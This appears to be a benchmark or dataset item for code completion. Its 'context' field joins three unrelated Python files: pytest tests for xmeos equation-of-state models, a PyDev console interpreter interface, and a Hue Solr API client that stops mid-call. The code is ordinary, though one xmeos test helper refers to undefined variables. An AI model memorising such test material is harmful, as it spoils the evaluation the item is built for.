gt
stringclasses
1 value
context
stringlengths
2.49k
119k
# from __future__ import absolute_import, print_function, division, with_statement from builtins import object import numpy as np import xmeos from xmeos import models from xmeos.models import core import pytest import matplotlib.pyplot as plt import matplotlib as mpl from abc import ABCMeta, abstractmethod import copy import test_models try: import cPickle as pickle except: import pickle #==================================================================== # Define "slow" tests # - indicated by @slow decorator # - slow tests are run only if using --runslow cmd line arg #==================================================================== slow = pytest.mark.skipif( not pytest.config.getoption("--runslow"), reason="need --runslow option to run" ) #==================================================================== # SEC:1 Abstract Test Classes #==================================================================== class BaseTestCompressEos(test_models.BaseTestEos): def test_press_S(self): self.calc_test_press(path_const='S') def test_press_T(self): self.calc_test_press(path_const='T') def test_press_0K(self): self.calc_test_press(path_const='0K') def calc_test_press(self, path_const='T'): TOL = 1e-3 Nsamp = 10001 eos_mod = self.load_eos(path_const=path_const) V0, = eos_mod.get_param_values(param_names='V0') V0 += -.137 eos_mod.set_param_values(V0,param_names='V0') V0get, = eos_mod.get_param_values(param_names='V0') assert V0 == V0get, 'Must be able to store and retrieve non-integer values' assert np.abs(eos_mod.press(V0))<TOL/100,( 'pressure at V0 must be zero by definition' ) Vmod_a = np.linspace(.7,1.2,Nsamp)*V0 dV = Vmod_a[1] - Vmod_a[0] press_a = eos_mod.press(Vmod_a) energy_a = eos_mod.energy(Vmod_a) abs_err, rel_err, range_err = self.numerical_deriv( Vmod_a, energy_a, press_a, scale=-core.CONSTS['PV_ratio']) assert range_err < TOL, 'range error in Press, ' + np.str(range_err) + \ ', must be less than TOL, ' + np.str(TOL) def do_test_energy_perturb_eval(self): TOL = 1e-4 dxfrac = 1e-8 Nsamp = 10001 eos_mod = self.init_params() param_d = eos_d['param_d'] Vmod_a = np.linspace(.7,1.3,Nsamp)*param_d['V0'] dV = Vmod_a[1] - Vmod_a[0] if compress_path_mod.expand_adj: scale_a, paramkey_a = \ compress_path_mod.get_param_scale( eos_d,apply_expand_adj=True ) else: scale_a, paramkey_a = compress_path_mod.get_param_scale( eos_d) Eperturb_num_a = np.zeros((paramkey_a.size,Nsamp)) for ind,paramkey in enumerate(paramkey_a): Eperturb_num_a[ind,:] = compress_path_mod.param_deriv\ ( 'energy', paramkey, Vmod_a, eos_d, dxfrac=dxfrac) # dEdV0_a = compress_path_mod.param_deriv( 'energy', 'V0', Vmod_a, eos_d, dxfrac=dxfrac) # dEdK0_a = compress_path_mod.param_deriv( 'energy', 'K0', Vmod_a, eos_d, dxfrac=dxfrac) # dEdKP0_a = compress_path_mod.param_deriv( 'energy', 'KP0', Vmod_a, eos_d, dxfrac=dxfrac) # dEdKP20_a = compress_path_mod.param_deriv( 'energy', 'KP20', Vmod_a, eos_d, dxfrac=dxfrac) # dEdE0_a = compress_path_mod.param_deriv( 'energy', 'E0', Vmod_a, eos_d, dxfrac=dxfrac) Eperturb_a, scale_a, paramkey_a = compress_path_mod.energy_perturb(Vmod_a, eos_d) # print paramkey_a # Eperturb_num_a = np.vstack((dEdV0_a,dEdK0_a,dEdKP0_a,dEdKP20_a,dEdE0_a)) max_error_a = np.max(np.abs(Eperturb_a-Eperturb_num_a),axis=1) # try: # except: # from IPython import embed; embed(); import ipdb; ipdb.set_trace() # plt.plot(Vmod_a,Eperturb_a.T,'-',Vmod_a, Eperturb_num_a.T,'--') # plt.ion() # plt.figure() # plt.clf() # plt.plot(Vmod_a[::100], Eperturb_num_a[:,::100].T,'x', # Vmod_a[::100], Eperturb_a[3,::100].T,'r-') # plt.plot(Vmod_a[::100], Eperturb_num_a[:,::100].T,'x', # Vmod_a, Eperturb_a.T,'-') # plt.plot(Vmod_a[::100], Eperturb_a[3,::100].T,'r-') # Eperturb_num_a-Eperturb_a assert np.all(max_error_a < TOL),'Error in energy perturbation must be'\ 'less than TOL.' ##################### # Explicitly call these test methods from super to guarantee correct # behavior of decorated xfail classes ##################### def test_param_getset(self): super(BaseTestCompressEos, self).test_param_getset() def test_pickle(self): super(BaseTestCompressEos, self).test_pickle() #==================================================================== #==================================================================== # SEC:2 Implimented Test Clases #==================================================================== # 2.1: CompressEos Tests #==================================================================== class TestVinet(BaseTestCompressEos): def load_eos(self, path_const='T'): eos_mod = models.CompressEos( kind='Vinet', path_const=path_const) return eos_mod #==================================================================== class TestBirchMurn3(BaseTestCompressEos): def load_eos(self, path_const='T'): eos_mod = models.CompressEos(kind='BirchMurn3', path_const=path_const) return eos_mod #==================================================================== class TestBirchMurn4(BaseTestCompressEos): def load_eos(self, path_const='T'): eos_mod = models.CompressEos(kind='BirchMurn4', path_const=path_const) return eos_mod #==================================================================== class TestGenFiniteStrain(BaseTestCompressEos): def load_eos(self, path_const='T'): eos_mod = models.CompressEos(kind='GenFiniteStrain', path_const=path_const) return eos_mod #==================================================================== class TestTait(BaseTestCompressEos): def load_eos(self, path_const='T'): eos_mod = models.CompressEos(kind='Tait', path_const=path_const) return eos_mod #==================================================================== notimplimented = pytest.mark.xfail(reason='PolyRho energy expressions not implimented yet.') @notimplimented class TestPolyRho(BaseTestCompressEos): def load_eos(self, path_const='T'): eos_mod = models.CompressEos(kind='PolyRho', path_const=path_const, order=6) return eos_mod def test_poly_scale(self): TOL = 1e-6 Nsamp = 101 eos_mod = self.load_eos() calc = eos_mod.calculators['compress'] V0, = eos_mod.get_param_values(param_names='V0') Vmod_a = np.linspace(.7,1.2,Nsamp)*V0 dV = Vmod_a[1] - Vmod_a[0] coef_a, rho0 = calc._get_poly_coef() rho_a = calc._vol_to_rho(Vmod_a) press_a = eos_mod.press(Vmod_a) press_direct_a = np.polyval(coef_a, rho_a-rho0) dev_a = press_a - press_direct_a assert np.all(np.abs(dev_a)<TOL), \ 'PolyRho polynomial calculation of press not consistent' #==================================================================== # class TestCompareCompressEos(object): # def init_params(self): # # Set model parameter values # E0 = 0.0 # eV/atom # V0 = 38.0 # 1e-5 m^3 / kg # K0 = 25.0 # GPa # KP0 = 9.0 # 1 # param_key_a = ['V0','K0','KP0','E0'] # param_val_a = np.array([ V0, K0, KP0, E0 ]) # # # core.set_consts( [], [], eos_d ) # core.set_params( param_key_a, param_val_a, eos_d ) # # return eos_d # # def get_eos_mods(self): # eos_vinet_d = self.init_params() # eos_tait_d = self.init_params() # # core.set_modtypes( ['CompressPathMod'], [compress.Vinet(path_const='S')], # eos_vinet_d ) # core.set_modtypes( ['CompressPathMod'], [compress.Tait(path_const='S')], # eos_tait_d ) # # return eos_vinet_d, eos_tait_d # # def calc_energy_perturb( self, eos_d ): # dxfrac = 1e-6 # Nsamp = 10001 # # param_d = eos_d['param_d'] # Vmod_a = np.linspace(.7,1.1,Nsamp)*param_d['V0'] # dV = Vmod_a[1] - Vmod_a[0] # # compress_path_mod = eos_d['modtype_d']['CompressPathMod'] # scale_a, paramkey_a = compress_path_mod.get_param_scale( eos_d ) # # Eperturb_num_a = np.zeros((paramkey_a.size,Nsamp)) # for ind,paramkey in enumerate(paramkey_a): # Eperturb_num_a[ind,:] = compress_path_mod.param_deriv\ # ( 'energy', paramkey, Vmod_a, eos_d, dxfrac=dxfrac) # # Eperturb_a, scale_a, paramkey_a = compress_path_mod.energy_perturb(Vmod_a, eos_d) # # Eperturb_num_a = np.zeros((paramkey_a.size,Nsamp)) # for ind,paramkey in enumerate(paramkey_a): # Eperturb_num_a[ind,:] = compress_path_mod.param_deriv\ # ( 'energy', paramkey, Vmod_a, eos_d, dxfrac=dxfrac) # # return Eperturb_a, Eperturb_num_a, Vmod_a, scale_a, paramkey_a # # def calc_energy( self, eos_d ): # dxfrac = 1e-6 # Nsamp = 10001 # # param_d = eos_d['param_d'] # Vmod_a = np.linspace(.7,1.1,Nsamp)*param_d['V0'] # dV = Vmod_a[1] - Vmod_a[0] # # compress_path_mod = eos_d['modtype_d']['CompressPathMod'] # scale_a, paramkey_a = compress_path_mod.get_param_scale( eos_d ) # # energy_a = compress_path_mod.energy( Vmod_a, eos_d ) # # return energy_a, Vmod_a # # def test_compare(self): # TOL = 1e-4 # # eos_vinet_d, eos_tait_d = self.get_eos_mods() # KP20 = -1.1*eos_tait_d['param_d']['KP0']/eos_tait_d['param_d']['K0'] # core.set_params( ['KP20'], [KP20], eos_tait_d ) # # energy_vin_a, Vmod_vin_a = self.calc_energy( eos_vinet_d ) # energy_tait_a, Vmod_tait_a = self.calc_energy( eos_tait_d ) # # # plt.ion() # # plt.figure() # # plt.clf() # # plt.plot(Vmod_vin_a, energy_vin_a,'k-', # # Vmod_tait_a, energy_tait_a, 'r-') # # Eperturb_vin_a, Eperturb_num_vin_a, Vmod_vin_a, scale_vin_a, \ # paramkey_vin_a = self.calc_energy_perturb( eos_vinet_d ) # # Eperturb_tait_a, Eperturb_num_tait_a, Vmod_tait_a, scale_tait_a, \ # paramkey_tait_a = self.calc_energy_perturb( eos_tait_d ) # # # from IPython import embed; embed(); import ipdb; ipdb.set_trace() # # # plt.ion() # # plt.figure() # # plt.clf() # # plt.plot(Vmod_vin_a[::100], Eperturb_vin_a[:,::100].T,'x', # # Vmod_tait_a, Eperturb_tait_a.T,'-') # # dV = Vmod_vin_a[1] - Vmod_vin_a[0] # V0 = eos_tait_d['param_d']['V0'] # indV0 = np.where(Vmod_vin_a==V0)[0][0] # # Eperturb_diff = Eperturb_vin_a[:,indV0] - Eperturb_tait_a[[0,1,2,4],indV0] # # assert np.all(np.abs(Eperturb_diff)<TOL), \ # 'Energy perturbations for Vinet and Tait EOS at V0 must agree to within TOL' # # # Calc numerical volume derivs # # Some of these curves take very small values, making numerical # # comparison difficult, but comparison by eye checks out # dE1_perturb_vin_a = np.gradient(Eperturb_vin_a,dV)[1] # dE2_perturb_vin_a = np.gradient(dE1_perturb_vin_a,dV)[1] # dE3_perturb_vin_a = np.gradient(dE2_perturb_vin_a,dV)[1] # # dE1_perturb_tait_a = np.gradient(Eperturb_tait_a,dV)[1] # dE2_perturb_tait_a = np.gradient(dE1_perturb_tait_a,dV)[1] # dE3_perturb_tait_a = np.gradient(dE2_perturb_tait_a,dV)[1] # # # plt.clf() # # plt.plot(Vmod_vin_a[::100], dE1_perturb_vin_a[:,::100].T,'x', # # Vmod_tait_a, dE1_perturb_tait_a.T,'-') # # # plt.clf() # # plt.plot(Vmod_vin_a[::100], dE2_perturb_vin_a[:,::100].T,'x', # # Vmod_tait_a, dE2_perturb_tait_a.T,'-') # # # Eperturb_vin_a[:,indV0]-Eperturb_tait_a[[0,1,2,4],indV0] # # Eperturb_vin_a[:,indV0] # # # dE1_perturb_vin_a[:,indV0]-dE1_perturb_tait_a[[0,1,2,4],indV0] # # dE1_perturb_vin_a[:,indV0] # # # plt.clf() # # plt.plot(Vmod_vin_a[::100], dE3_perturb_vin_a[:,::100].T,'x', # # Vmod_tait_a, dE3_perturb_tait_a.T,'-') # # pass #==================================================================== # class TestExpandCompressPathMod(BaseTestCompressEos): # def load_eos(self, eos_d): # compress_path_mod = compress.Vinet(path_const='S',expand_adj_mod=compress.Tait()) # core.set_modtypes(['CompressPathMod'],[compress_path_mod], eos_d ) # # pass # # def test_press_components(self): # TOL = 1e-4 # dxfrac = 1e-8 # # Nsamp = 10001 # eos_d = self.init_params() # # param_d = eos_d['param_d'] # Vmod_a = np.linspace(.7,1.3,Nsamp)*param_d['V0'] # dV = Vmod_a[1] - Vmod_a[0] # # compress_path_mod = eos_d['modtype_d']['CompressPathMod'] # # press_a = compress_path_mod.press( Vmod_a, eos_d ) # press_pos_a = compress_path_mod.press( Vmod_a, eos_d, apply_expand_adj=False) # press_neg_a = compress_path_mod.expand_adj_mod.press( Vmod_a, eos_d ) # # # press_pos_a = expand_pos_mod.press( Vmod_a, eos_d ) # # press_neg_a = expand_neg_mod.press( Vmod_a, eos_d ) # # # ind_neg = Vmod_a>param_d['V0'] # ind_pos = Vmod_a<param_d['V0'] # # assert np.all(press_a[ind_neg]==press_neg_a[ind_neg]),\ # 'The expansion corrected press must match ExpandNegMod for negative pressure values' # assert np.all(press_a[ind_pos]==press_pos_a[ind_pos]),\ # 'The expansion corrected press must match ExpandPosMod for positive pressure values' # # # from IPython import embed; embed(); import ipdb; ipdb.set_trace() # # plt.ion() # # plt.figure() # # plt.clf() # # plt.plot(Vmod_a, press_pos_a, 'r--', Vmod_a, press_neg_a, 'b--', # # Vmod_a, press_a, 'k-') # # pass # # def test_energy_components(self): # TOL = 1e-4 # dxfrac = 1e-8 # # Nsamp = 10001 # eos_d = self.init_params() # # param_d = eos_d['param_d'] # Vmod_a = np.linspace(.7,1.3,Nsamp)*param_d['V0'] # dV = Vmod_a[1] - Vmod_a[0] # # compress_path_mod = eos_d['modtype_d']['CompressPathMod'] # # energy_a = compress_path_mod.energy( Vmod_a, eos_d ) # energy_pos_a = compress_path_mod.energy( Vmod_a, eos_d, apply_expand_adj=False ) # energy_neg_a = compress_path_mod.expand_adj_mod.energy( Vmod_a, eos_d ) # # # ind_neg = Vmod_a>param_d['V0'] # ind_pos = Vmod_a<param_d['V0'] # # assert np.all(energy_a[ind_neg]==energy_neg_a[ind_neg]),\ # 'The expansion corrected energy must match ExpandNegMod for negative pressure values' # assert np.all(energy_a[ind_pos]==energy_pos_a[ind_pos]),\ # 'The expansion corrected energy must match ExpandPosMod for positive pressure values' # # # # from IPython import embed; embed(); import ipdb; ipdb.set_trace() # # plt.ion() # # plt.figure() # # plt.clf() # # plt.plot(Vmod_a, energy_pos_a, 'r--', Vmod_a, energy_neg_a, 'b--', # # Vmod_a, energy_a, 'k-') # # pass # # def test_energy_perturb_eval(self): # self.do_test_energy_perturb_eval() # pass #====================================================================
import os import sys import traceback from _pydev_bundle import _pydev_imports_tipper from _pydev_bundle.pydev_code_executor import BaseCodeExecutor from _pydev_bundle.pydev_console_types import CodeFragment from _pydev_bundle.pydev_imports import Exec from _pydev_bundle.pydev_stdin import StdIn, DebugConsoleStdIn from _pydev_imps._pydev_saved_modules import thread from _pydevd_bundle import pydevd_thrift from _pydevd_bundle import pydevd_vars from _pydevd_bundle.pydevd_constants import IS_JYTHON, dict_iter_items from pydev_console.protocol import CompletionOption, CompletionOptionType try: import cStringIO as StringIO #may not always be available @UnusedImport except: try: import StringIO #@Reimport except: import io as StringIO # translation to Thrift `CompletionOptionType` enumeration COMPLETION_OPTION_TYPES = { _pydev_imports_tipper.TYPE_IMPORT: CompletionOptionType.IMPORT, _pydev_imports_tipper.TYPE_CLASS: CompletionOptionType.CLASS, _pydev_imports_tipper.TYPE_FUNCTION: CompletionOptionType.FUNCTION, _pydev_imports_tipper.TYPE_ATTR: CompletionOptionType.ATTR, _pydev_imports_tipper.TYPE_BUILTIN: CompletionOptionType.BUILTIN, _pydev_imports_tipper.TYPE_PARAM: CompletionOptionType.PARAM, _pydev_imports_tipper.TYPE_IPYTHON: CompletionOptionType.IPYTHON, _pydev_imports_tipper.TYPE_IPYTHON_MAGIC: CompletionOptionType.IPYTHON_MAGIC, } def _to_completion_option(word): name, documentation, args, ret_type = word completion_option_type = COMPLETION_OPTION_TYPES[ret_type] return CompletionOption(name, documentation, args.split(), completion_option_type) # ======================================================================================================================= # Null # ======================================================================================================================= class Null: """ Gotten from: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/68205 """ def __init__(self, *args, **kwargs): return None def __call__(self, *args, **kwargs): return self def __getattr__(self, mname): return self def __setattr__(self, name, value): return self def __delattr__(self, name): return self def __repr__(self): return "<Null>" def __str__(self): return "Null" def __len__(self): return 0 def __getitem__(self): return self def __setitem__(self, *args, **kwargs): pass def write(self, *args, **kwargs): pass def __nonzero__(self): return 0 # ======================================================================================================================= # BaseInterpreterInterface # ======================================================================================================================= class BaseInterpreterInterface(BaseCodeExecutor): def __init__(self, mainThread, connect_status_queue=None, rpc_client=None): super(BaseInterpreterInterface, self).__init__() self.mainThread = mainThread self.banner_shown = False self.connect_status_queue = connect_status_queue self.rpc_client = rpc_client def build_banner(self): return 'print({0})\n'.format(repr(self.get_greeting_msg())) def create_std_in(self, debugger=None, original_std_in=None): if debugger is None: return StdIn(self, self.rpc_client, original_stdin=original_std_in) else: return DebugConsoleStdIn(dbg=debugger, original_stdin=original_std_in) def do_exec_code(self, code, is_single_line): try: code_fragment = CodeFragment(code, is_single_line) more = self.need_more(code_fragment) if not more: code_fragment = self.buffer self.buffer = None self.exec_queue.put(code_fragment) return more except: traceback.print_exc() return False def execLine(self, line): if not self.banner_shown: line = self.build_banner() + line self.banner_shown = True return self.do_exec_code(line, True) def execMultipleLines(self, lines): if not self.banner_shown: lines = self.build_banner() + lines self.banner_shown = True if IS_JYTHON: for line in lines.split('\n'): self.do_exec_code(line, True) else: return self.do_exec_code(lines, False) def interrupt(self): self.buffer = None # Also clear the buffer when it's interrupted. try: if self.interruptable: called = False try: # Fix for #PyDev-500: Console interrupt can't interrupt on sleep import os import signal if os.name == 'posix': # On Linux we can't interrupt 0 as in Windows because it's # actually owned by a process -- on the good side, signals # work much better on Linux! os.kill(os.getpid(), signal.SIGINT) called = True elif os.name == 'nt': # Stupid windows: sending a Ctrl+C to a process given its pid # is absurdly difficult. # There are utilities to make it work such as # http://www.latenighthacking.com/projects/2003/sendSignal/ # but fortunately for us, it seems Python does allow a CTRL_C_EVENT # for the current process in Windows if pid 0 is passed... if we needed # to send a signal to another process the approach would be # much more difficult. # Still, note that CTRL_C_EVENT is only Python 2.7 onwards... # Also, this doesn't seem to be documented anywhere!? (stumbled # upon it by chance after digging quite a lot). os.kill(0, signal.CTRL_C_EVENT) called = True except: # Many things to go wrong (from CTRL_C_EVENT not being there # to failing import signal)... if that's the case, ask for # forgiveness and go on to the approach which will interrupt # the main thread (but it'll only work when it's executing some Python # code -- not on sleep() for instance). pass if not called: if hasattr(thread, 'interrupt_main'): # Jython doesn't have it thread.interrupt_main() else: self.mainThread._thread.interrupt() # Jython self.finish_exec(False) return True except: traceback.print_exc() return False def close(self): sys.exit(0) def get_server(self): if getattr(self, 'rpc_client', None) is not None: return self.rpc_client else: return None server = property(get_server) def ShowConsole(self): server = self.get_server() if server is not None: server.showConsole() def finish_exec(self, more): self.interruptable = False server = self.get_server() if server is not None: return server.notifyFinished(more) else: return True def getFrame(self): hidden_ns = self.get_ipython_hidden_vars_dict() return pydevd_thrift.frame_vars_to_struct(self.get_namespace(), hidden_ns) def getVariable(self, attributes): debug_values = [] val_dict = pydevd_vars.resolve_compound_var_object_fields(self.get_namespace(), attributes) if val_dict is None: val_dict = {} keys = val_dict.keys() for k in keys: val = val_dict[k] evaluate_full_value = pydevd_thrift.should_evaluate_full_value(val) debug_values.append(pydevd_thrift.var_to_struct(val, k, evaluate_full_value=evaluate_full_value)) return debug_values def getArray(self, attr, roffset, coffset, rows, cols, format): name = attr.split("\t")[-1] array = pydevd_vars.eval_in_context(name, self.get_namespace(), self.get_namespace()) return pydevd_thrift.table_like_struct_to_thrift_struct(array, name, roffset, coffset, rows, cols, format) def evaluate(self, expression): # returns `DebugValue` of evaluated expression result = pydevd_vars.eval_in_context(expression, self.get_namespace(), self.get_namespace()) return [pydevd_thrift.var_to_struct(result, expression)] def do_get_completions(self, text, act_tok): """Retrieves completion options. Returns the array with completion options tuples. :param text: the full text of the expression to complete :param act_tok: resolved part of the expression :return: the array of tuples `(name, documentation, args, ret_type)` :Example: Let us execute ``import time`` line in the Python console. Then try to complete ``time.sle`` expression. At this point the method would receive ``time.sle`` as ``text`` parameter and ``time.`` as ``act_tok`` parameter. The result would contain the array with the following tuple among others: ``[..., ('sleep', 'sleep(seconds)\\n\\nDelay execution ...', '(seconds)', '2'), ...]``. """ try: from _pydev_bundle._pydev_completer import Completer completer = Completer(self.get_namespace(), None) return completer.complete(act_tok) except: import traceback traceback.print_exc() return [] def getCompletions(self, text, act_tok): words = self.do_get_completions(text, act_tok) return [_to_completion_option(word) for word in words] def loadFullValue(self, seq, scope_attrs): """ Evaluate full value for async Console variables in a separate thread and send results to IDE side :param seq: id of command :param scope_attrs: a sequence of variables with their attributes separated by NEXT_VALUE_SEPARATOR (i.e.: obj\tattr1\tattr2NEXT_VALUE_SEPARATORobj2\attr1\tattr2) :return: """ frame_variables = self.get_namespace() var_objects = [] # vars = scope_attrs.split(NEXT_VALUE_SEPARATOR) vars = scope_attrs for var_attrs in vars: if '\t' in var_attrs: name, attrs = var_attrs.split('\t', 1) else: name = var_attrs attrs = None if name in frame_variables.keys(): var_object = pydevd_vars.resolve_var_object(frame_variables[name], attrs) var_objects.append((var_object, name)) else: var_object = pydevd_vars.eval_in_context(name, frame_variables, frame_variables) var_objects.append((var_object, name)) from _pydev_bundle.pydev_console_commands import ThriftGetValueAsyncThreadConsole t = ThriftGetValueAsyncThreadConsole(self.get_server(), seq, var_objects) t.start() def changeVariable(self, attr, value): def do_change_variable(): Exec('%s=%s' % (attr, value), self.get_namespace(), self.get_namespace()) # Important: it has to be really enabled in the main thread, so, schedule # it to run in the main thread. self.exec_queue.put(do_change_variable) def _findFrame(self, thread_id, frame_id): ''' Used to show console with variables connection. Always return a frame where the locals map to our internal namespace. ''' VIRTUAL_FRAME_ID = "1" # matches PyStackFrameConsole.java VIRTUAL_CONSOLE_ID = "console_main" # matches PyThreadConsole.java if thread_id == VIRTUAL_CONSOLE_ID and frame_id == VIRTUAL_FRAME_ID: f = FakeFrame() f.f_globals = {} # As globals=locals here, let's simply let it empty (and save a bit of network traffic). f.f_locals = self.get_namespace() return f else: return self.orig_find_frame(thread_id, frame_id) def connectToDebugger(self, debuggerPort, debugger_options=None, extra_envs=None): ''' Used to show console with variables connection. Mainly, monkey-patches things in the debugger structure so that the debugger protocol works. ''' if debugger_options is None: debugger_options = {} for (env_name, value) in dict_iter_items(extra_envs): existing_value = os.environ.get(env_name, None) if existing_value: os.environ[env_name] = "%s%c%s" % (existing_value, os.path.pathsep, value) else: os.environ[env_name] = value if env_name == "PYTHONPATH": sys.path.append(value) def do_connect_to_debugger(): try: # Try to import the packages needed to attach the debugger import pydevd from _pydev_imps._pydev_saved_modules import threading except: # This happens on Jython embedded in host eclipse traceback.print_exc() sys.stderr.write('pydevd is not available, cannot connect\n', ) from _pydev_bundle import pydev_localhost threading.currentThread().__pydevd_id__ = "console_main" self.orig_find_frame = pydevd_vars.find_frame pydevd_vars.find_frame = self._findFrame self.debugger = pydevd.PyDB() try: pydevd.apply_debugger_options(debugger_options) self.debugger.connect(pydev_localhost.get_localhost(), debuggerPort) self.debugger.prepare_to_run() from _pydevd_bundle import pydevd_tracing pydevd_tracing.SetTrace(None) except: traceback.print_exc() sys.stderr.write('Failed to connect to target debugger.\n') # Register to process commands when idle self.debugrunning = False try: import pydevconsole pydevconsole.set_debug_hook(self.debugger.process_internal_commands) except: traceback.print_exc() sys.stderr.write('Version of Python does not support debuggable Interactive Console.\n') # Important: it has to be really enabled in the main thread, so, schedule # it to run in the main thread. self.exec_queue.put(do_connect_to_debugger) return ('connect complete',) def handshake(self): if self.connect_status_queue is not None: self.connect_status_queue.put(True) return "PyCharm" def get_connect_status_queue(self): return self.connect_status_queue def hello(self, input_str): # Don't care what the input string is return ("Hello eclipse",) # ======================================================================================================================= # FakeFrame # ======================================================================================================================= class FakeFrame: ''' Used to show console with variables connection. A class to be used as a mock of a frame. '''
#!/usr/bin/env python # -- coding: utf-8 -- # Licensed to Cloudera, Inc. under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. Cloudera, Inc. licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import logging import re import urllib from itertools import groupby from django.utils.translation import ugettext as _ from desktop.lib.exceptions_renderable import PopupException from desktop.lib.i18n import force_unicode from desktop.lib.rest.http_client import HttpClient, RestException from desktop.lib.rest import resource from search.conf import EMPTY_QUERY, SECURITY_ENABLED from search.api import _compute_range_facet from libsolr.conf import SSL_CERT_CA_VERIFY LOG = logging.getLogger(__name__) DEFAULT_USER = 'hue' def utf_quoter(what): return urllib.quote(unicode(what).encode('utf-8'), safe='~@#$&()*!+=;,.?/\'') class SolrApi(object): """ http://wiki.apache.org/solr/CoreAdmin#CoreAdminHandler """ def __init__(self, solr_url, user, security_enabled=SECURITY_ENABLED.get(), ssl_cert_ca_verify=SSL_CERT_CA_VERIFY.get()): self._url = solr_url self._user = user self._client = HttpClient(self._url, logger=LOG) self.security_enabled = security_enabled if self.security_enabled: self._client.set_kerberos_auth() self._client.set_verify(ssl_cert_ca_verify) self._root = resource.Resource(self._client) # The Kerberos handshake requires two requests in order to authenticate, # but if our first request is a PUT/POST, it might flat-out reject the # first request if the body is too large. So, connect here in order to get # a cookie so future PUT/POSTs will be pre-authenticated. if self.security_enabled: self._root.invoke('HEAD', '/') def _get_params(self): if self.security_enabled: return (('doAs', self._user ),) return (('user.name', DEFAULT_USER), ('doAs', self._user),) def _get_q(self, query): q_template = '(%s)' if len(query['qs']) >= 2 else '%s' return 'OR'.join([q_template % (q['q'] or EMPTY_QUERY.get()) for q in query['qs']]).encode('utf-8') def _get_aggregate_function(self, facet): props = { 'field': facet['field'], 'aggregate': facet['properties']['aggregate'] if 'properties' in facet else facet['aggregate'] } if props['aggregate'] == 'median': return 'percentile(%(field)s,50)' % props else: return '%(aggregate)s(%(field)s)' % props def _get_range_borders(self, collection, query): props = {} GAPS = { '5MINUTES': { 'histogram-widget': {'coeff': '+3', 'unit': 'SECONDS'}, # ~100 slots 'bucket-widget': {'coeff': '+3', 'unit': 'SECONDS'}, # ~100 slots 'bar-widget': {'coeff': '+3', 'unit': 'SECONDS'}, # ~100 slots 'facet-widget': {'coeff': '+1', 'unit': 'MINUTES'}, # ~10 slots }, '30MINUTES': { 'histogram-widget': {'coeff': '+20', 'unit': 'SECONDS'}, 'bucket-widget': {'coeff': '+20', 'unit': 'SECONDS'}, 'bar-widget': {'coeff': '+20', 'unit': 'SECONDS'}, 'facet-widget': {'coeff': '+5', 'unit': 'MINUTES'}, }, '1HOURS': { 'histogram-widget': {'coeff': '+30', 'unit': 'SECONDS'}, 'bucket-widget': {'coeff': '+30', 'unit': 'SECONDS'}, 'bar-widget': {'coeff': '+30', 'unit': 'SECONDS'}, 'facet-widget': {'coeff': '+10', 'unit': 'MINUTES'}, }, '12HOURS': { 'histogram-widget': {'coeff': '+7', 'unit': 'MINUTES'}, 'bucket-widget': {'coeff': '+7', 'unit': 'MINUTES'}, 'bar-widget': {'coeff': '+7', 'unit': 'MINUTES'}, 'facet-widget': {'coeff': '+1', 'unit': 'HOURS'}, }, '1DAYS': { 'histogram-widget': {'coeff': '+15', 'unit': 'MINUTES'}, 'bucket-widget': {'coeff': '+15', 'unit': 'MINUTES'}, 'bar-widget': {'coeff': '+15', 'unit': 'MINUTES'}, 'facet-widget': {'coeff': '+3', 'unit': 'HOURS'}, }, '2DAYS': { 'histogram-widget': {'coeff': '+30', 'unit': 'MINUTES'}, 'bucket-widget': {'coeff': '+30', 'unit': 'MINUTES'}, 'bar-widget': {'coeff': '+30', 'unit': 'MINUTES'}, 'facet-widget': {'coeff': '+6', 'unit': 'HOURS'}, }, '7DAYS': { 'histogram-widget': {'coeff': '+3', 'unit': 'HOURS'}, 'bucket-widget': {'coeff': '+3', 'unit': 'HOURS'}, 'bar-widget': {'coeff': '+3', 'unit': 'HOURS'}, 'facet-widget': {'coeff': '+1', 'unit': 'DAYS'}, }, '1MONTHS': { 'histogram-widget': {'coeff': '+12', 'unit': 'HOURS'}, 'bucket-widget': {'coeff': '+12', 'unit': 'HOURS'}, 'bar-widget': {'coeff': '+12', 'unit': 'HOURS'}, 'facet-widget': {'coeff': '+5', 'unit': 'DAYS'}, }, '3MONTHS': { 'histogram-widget': {'coeff': '+1', 'unit': 'DAYS'}, 'bucket-widget': {'coeff': '+1', 'unit': 'DAYS'}, 'bar-widget': {'coeff': '+1', 'unit': 'DAYS'}, 'facet-widget': {'coeff': '+30', 'unit': 'DAYS'}, }, '1YEARS': { 'histogram-widget': {'coeff': '+3', 'unit': 'DAYS'}, 'bucket-widget': {'coeff': '+3', 'unit': 'DAYS'}, 'bar-widget': {'coeff': '+3', 'unit': 'DAYS'}, 'facet-widget': {'coeff': '+12', 'unit': 'MONTHS'}, }, '2YEARS': { 'histogram-widget': {'coeff': '+7', 'unit': 'DAYS'}, 'bucket-widget': {'coeff': '+7', 'unit': 'DAYS'}, 'bar-widget': {'coeff': '+7', 'unit': 'DAYS'}, 'facet-widget': {'coeff': '+3', 'unit': 'MONTHS'}, }, '10YEARS': { 'histogram-widget': {'coeff': '+1', 'unit': 'MONTHS'}, 'bucket-widget': {'coeff': '+1', 'unit': 'MONTHS'}, 'bar-widget': {'coeff': '+1', 'unit': 'MONTHS'}, 'facet-widget': {'coeff': '+1', 'unit': 'YEARS'}, } } time_field = collection['timeFilter'].get('field') if time_field and (collection['timeFilter']['value'] != 'all' or collection['timeFilter']['type'] == 'fixed'): # fqs overrides main time filter fq_time_ids = [fq['id'] for fq in query['fqs'] if fq['field'] == time_field] props['time_filter_overrides'] = fq_time_ids props['time_field'] = time_field if collection['timeFilter']['type'] == 'rolling': props['field'] = collection['timeFilter']['field'] props['from'] = 'NOW-%s' % collection['timeFilter']['value'] props['to'] = 'NOW' props['gap'] = GAPS.get(collection['timeFilter']['value']) elif collection['timeFilter']['type'] == 'fixed': props['field'] = collection['timeFilter']['field'] props['from'] = collection['timeFilter']['from'] props['to'] = collection['timeFilter']['to'] props['fixed'] = True return props def _get_time_filter_query(self, timeFilter, facet): if 'fixed' in timeFilter: props = {} stat_facet = {'min': timeFilter['from'], 'max': timeFilter['to']} _compute_range_facet(facet['widgetType'], 